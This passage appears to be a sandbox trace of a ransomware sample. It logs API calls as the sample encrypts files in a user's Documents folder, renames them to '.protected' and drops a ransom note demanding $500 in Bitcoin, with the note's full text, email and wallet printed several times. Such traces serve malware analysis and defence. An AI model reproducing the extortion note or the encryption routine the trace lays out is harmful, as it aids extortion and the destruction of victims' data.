lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0091.483] CloseHandle (hObject=0xd8) returned 1 [0091.484] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.protected") returned 83 [0091.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.protected")) returned 1 [0091.485] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0091.485] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0091.485] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\RESTORE_FILES.txt") returned 80 [0091.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.486] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.486] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0091.487] lstrlenA (lpString="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") returned 684 [0091.487] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0091.487] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.487] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0091.487] CloseHandle (hObject=0xd4) returned 1 [0091.487] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.487] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.487] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\RESTORE_FILES.txt") returned 71 [0091.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.488] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.488] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.489] lstrlenA (lpString="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") returned 684 [0091.489] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.489] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.489] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0091.489] CloseHandle (hObject=0xb4) returned 1 [0091.491] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="Windows") returned -1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="Program Files") returned -1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="Program Files (x86)") returned -1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="$Recycle.bin") returned 1 [0091.491] lstrcmpiW (lpString1="My Videos", lpString2="System Volume Information") returned -1 [0091.491] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned 53 [0091.491] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0091.491] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0091.491] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*") returned 55 [0091.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0091.491] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="Windows") returned -1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="Program Files") returned -1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="Program Files (x86)") returned -1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="$Recycle.bin") returned 1 [0091.492] lstrcmpiW (lpString1="nMxPI49aM3RP.ots", lpString2="System Volume Information") returned -1 [0091.492] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.492] StrStrIW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".protected") returned 0x0 [0091.492] lstrcmpW (lpString1="nMxPI49aM3RP.ots", lpString2="RESTORE_FILES.txt") returned -1 [0091.492] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.492] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nmxpi49am3rp.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.492] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.493] StrStrW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".txt") returned 0x0 [0091.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.493] StrStrW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".rar") returned 0x0 [0091.493] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots") returned 60 [0091.493] StrStrW (lpFirst="nMxPI49aM3RP.ots", lpSrch=".zip") returned 0x0 [0091.493] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.494] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.494] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.494] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.494] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.494] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.494] CloseHandle (hObject=0xb4) returned 1 [0091.494] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots.protected") returned 70 [0091.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nmxpi49am3rp.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nMxPI49aM3RP.ots.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nmxpi49am3rp.ots.protected")) returned 1 [0091.495] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="Windows") returned -1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="Program Files") returned -1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="Program Files (x86)") returned -1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="$Recycle.bin") returned 1 [0091.495] lstrcmpiW (lpString1="NzyaSFus.docx", lpString2="System Volume Information") returned -1 [0091.495] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.495] StrStrIW (lpFirst="NzyaSFus.docx", lpSrch=".protected") returned 0x0 [0091.495] lstrcmpW (lpString1="NzyaSFus.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.495] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nzyasfus.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.496] StrStrW (lpFirst="NzyaSFus.docx", lpSrch=".txt") returned 0x0 [0091.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.496] StrStrW (lpFirst="NzyaSFus.docx", lpSrch=".rar") returned 0x0 [0091.496] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx") returned 57 [0091.496] StrStrW (lpFirst="NzyaSFus.docx", lpSrch=".zip") returned 0x0 [0091.496] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.497] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.497] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | 
out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.497] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.497] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.497] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.497] CloseHandle (hObject=0xb4) returned 1 [0091.497] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx.protected") returned 67 [0091.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nzyasfus.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NzyaSFus.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nzyasfus.docx.protected")) returned 1 [0091.498] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="Windows") returned -1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="Program Files") returned -1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="Program Files (x86)") returned -1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="$Recycle.bin") returned 1 [0091.498] lstrcmpiW (lpString1="Outlook Files", lpString2="System Volume Information") returned -1 [0091.498] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Outlook Files") returned 57 [0091.498] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0091.498] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0091.498] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*") returned 59 [0091.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.498] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.498] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.498] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.498] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.498] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.499] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\.") returned 59 [0091.499] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.499] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.499] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.499] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.499] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.499] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.499] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.499] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\..") returned 60 [0091.499] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.499] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0091.499] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Windows") returned -1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Program Files") returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Program Files (x86)") returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="$Recycle.bin") returned 1 [0091.499] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="System Volume Information") returned 1 [0091.499] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.499] StrStrIW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".protected") returned 0x0 [0091.499] lstrcmpW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="RESTORE_FILES.txt") returned 1 [0091.499] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.499] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.499] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.499] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".txt") returned 0x0 [0091.500] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.500] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".rar") returned 0x0 [0091.500] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0091.500] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch=".zip") returned 0x0 [0091.500] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.502] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.502] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.502] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.502] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.519] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.519] CloseHandle (hObject=0xd4) returned 1 [0091.520] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.protected") returned 90 [0091.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.protected")) returned 1 [0091.521] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.521] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.521] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\RESTORE_FILES.txt") returned 75 [0091.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.521] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.522] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.524] 